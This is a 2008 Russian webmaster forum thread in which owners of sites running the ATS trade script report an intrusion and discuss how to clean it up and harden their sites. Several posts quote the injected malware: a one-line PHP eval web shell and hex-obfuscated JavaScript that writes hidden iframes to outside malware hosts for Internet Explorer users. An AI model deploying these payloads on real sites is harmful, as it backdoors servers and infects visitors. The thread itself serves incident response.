С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
 Добавлено: 05/11/08 в 16:51 |
добавился какой-то хxx
по мылу пришло
domain: masex.com\"><iframe_width=1_height=1_src=http
ни посмотреть не могу, ни удалить из админки
пишет при удалении
Warning: opendir(./tradefiles/masex.com\\\\/) [function.opendir]: failed to open dir: No such file or directory in blablablablabla/public_html/inc0.php on line 594
скрипт АТС
саппорт молчит пока
кто-нить сталкивался?
Последний раз редактировалось: Don Juan (06/11/08 в 02:56), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 13.06.08
Сообщения: 39
Рейтинг: 61
|
| Добавлено: 05/11/08 в 17:24 |
мне тоже добавился
отметь галочкой и нажми кнопку "удалить"
|
|
|
|
| |
С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
| Добавлено: 05/11/08 в 17:33 |
удалился....
ошибка вылетала, но он удалился
вопрос решен
|
|
|
|
| |
С нами с 08.04.08
Сообщения: 26
Рейтинг: 18
|
| Добавлено: 05/11/08 в 17:37 |
У меня тоже добавился, но я ничего не делал, он сам пропал с админки.
|
|
|
|
| |
С нами с 19.12.05
Сообщения: 111
Рейтинг: 104
|
| Добавлено: 05/11/08 в 21:11 |
У меня тоже добавилось что-то подобное. Удалил без проблем вроде.
|
|
|
|
| |
С нами с 08.09.03
Сообщения: 627
Рейтинг: 654
|
| Добавлено: 05/11/08 в 21:45 |
пришла пора АТС ? 
|
|
|
|
| |
+
сам дебил
С нами с 25.07.06
Сообщения: 5379
Рейтинг: 1822
|
| Добавлено: 05/11/08 в 22:44 |
походу взломали
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 05/11/08 в 23:22 |
Пытаются периодически ломать, значит скрипт становится популярным. Для предотвращения заюзайте встроенную капчу, это говно добавляется ботом, а он капчу не пройдет. В аське завтра буду обязательно, тс постучи, мне интересно содержание мыла.
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 06/11/08 в 01:38 |
гм, эта гнида кусочек себя пишет в Settings -> Trade rules
гляньте у кого там че вписано после рулесов
|
|
|
|
| |
С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
| Добавлено: 06/11/08 в 02:52 |
| von Stoltz писал: | | Пытаются периодически ломать, значит скрипт становится популярным. Для предотвращения заюзайте встроенную капчу, это говно добавляется ботом, а он капчу не пройдет. В аське завтра буду обязательно, тс постучи, мне интересно содержание мыла. |
я незнаю твоей аси, с саппортом общаюсь
моя 37908982nine
|
|
|
|
| |
С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
| Добавлено: 06/11/08 в 02:54 |
| Grach писал: | гм, эта гнида кусочек себя пишет в Settings -> Trade rules
гляньте у кого там че вписано после рулесов |
+1 проверяйте!
и кто найдет отпишите здесь, я удалил сразу в буффер не скопировалось мля
|
|
|
|
| |
С нами с 14.07.08
Сообщения: 1599
Рейтинг: 2022
|
| Добавлено: 06/11/08 в 03:02 |
а че там написано то.
|
|
|
|
| |
С нами с 08.04.08
Сообщения: 26
Рейтинг: 18
|
| Добавлено: 06/11/08 в 04:06 |
У меня появилось:
1.No illegal sites 2.No sites with consoles 3.no exploits, viruses, dialers, active-x, etc. | Код: | | <?php eval(stripslashes($_POST[ss]));?> |
|
|
|
|
| |
С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
| Добавлено: 06/11/08 в 04:23 |
тоже самое было
|
|
|
|
| |
С нами с 01.03.04
Сообщения: 682
Рейтинг: 640
|
| Добавлено: 06/11/08 в 06:40 |
тоже такое было...
а вот щас обнаружил что в код темлейта посередине вот эта хрень прописалась и каспер орёт что троян и эксплоит... бля..
<script> var s='3C696672616D65207372633D22687474703A2F2F6C657A6875
6E7465722E636F6D2F73742F6373732F7A2F7374617469632E7068702220686569
6768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474
683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2)
{ var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var
v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1
&& v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
удалил а он сцука опять через время появляется
|
|
|
|
| |
С нами с 11.08.07
Сообщения: 114
Рейтинг: 217
|
| Добавлено: 06/11/08 в 08:25 |
та же история... добавился ко мне на 1 сайт, а код изменил и exploit грузит на всех сиджах находящихся на серваке... вэри бэд...
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 06/11/08 в 08:25 |
209 905 775. Рекомендуется еще зашифровать пароль на админку, это делается галкой secure в settings, поменять темплейт через webmaster.php нереально, видимо ломают админку или фтп
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 09:27 |
Бля, заблокировали сайт, что за херня, что теперь делать? В админку зайти не могу, как убить эту хрень? И как в ATS закрыть авторегистрацию?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 06/11/08 в 09:51 |
у кого поломали домены - скиньте плс аксес-логи апача (сутки от времени взлома и до времени взлома), буду премного благодарен.
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 06/11/08 в 10:00 |
зайти через фтп, темплейт находится в файле ./templates/default_1.tpl и других .tpl в этой папке. Файлы установок в папке ./settings, поставьте права 644 на темплейт и файлы установок после завершения их редактирования и зашифруйте пароль и хрен какая сука вломится. И закройте авторегистрацию Settings-Trade Settings-Default Status-No New Trades
|
|
|
|
| |
С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
| Добавлено: 06/11/08 в 10:05 |
а если Disabled?
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 10:13 |
это оно? 
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 06/11/08 в 10:54 |
disabled не поможет, кого поломали, постучите в асю плиз. Нужно понимать в какие файлы вносятся изменения чтобы сделать заплатку.
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 11:00 |
а куда стукать то? какая ася? 11438640пять?
|
|
|
|
| |
С нами с 14.07.08
Сообщения: 1599
Рейтинг: 2022
|
| Добавлено: 06/11/08 в 11:12 |
тоже как-то было такое. Саппорт трафикхолдера написал, что у меня иксплойт, удалил код и все стало нормуль.
|
|
|
|
| |
